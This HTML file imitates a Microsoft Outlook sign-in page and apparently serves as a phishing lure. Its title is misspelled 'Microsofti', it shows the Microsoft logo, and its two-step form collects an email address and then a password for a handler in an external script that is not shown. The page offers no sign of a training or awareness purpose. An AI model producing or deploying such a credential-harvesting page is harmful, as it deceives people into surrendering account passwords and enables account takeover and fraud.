<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In - Microsofti</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>Outlook</h1>
        <div class="signin-box">
            <img src="https://img.icons8.com/color/48/000000/microsoft.png" alt="Microsoft Logo">
            <h3>Sign in</h3>
            <p id="prompt">to continue to Outlook</p>
            
            <form id="signin-form" onsubmit="return handleSubmit(event)">
                <div id="email-section">
                    <input type="text" name="email" placeholder="Email, phone, or Skype" id="email-input" required>
                    <p class="create-account">No account? <a href="#">Create one!</a></p>
                    <button class="next-btn" type="button" onclick="showPasswordSection()">Next</button>
                </div>
                
                <div id="password-section" style="display:none;">
                    <input type="password" name="password" placeholder="Enter your password" id="password-input" required>
                    <button class="next-btn" type="submit">Sign In</button>
                </div>
            </form>
            
            <div class="signin-options">
                <input type="checkbox" id="keep-signed-in">
                <label for="keep-signed-in">Sign-in options</label>
            </div>
        </div>
    </div>
    <script src="script.js"></script>
</body>
</html>
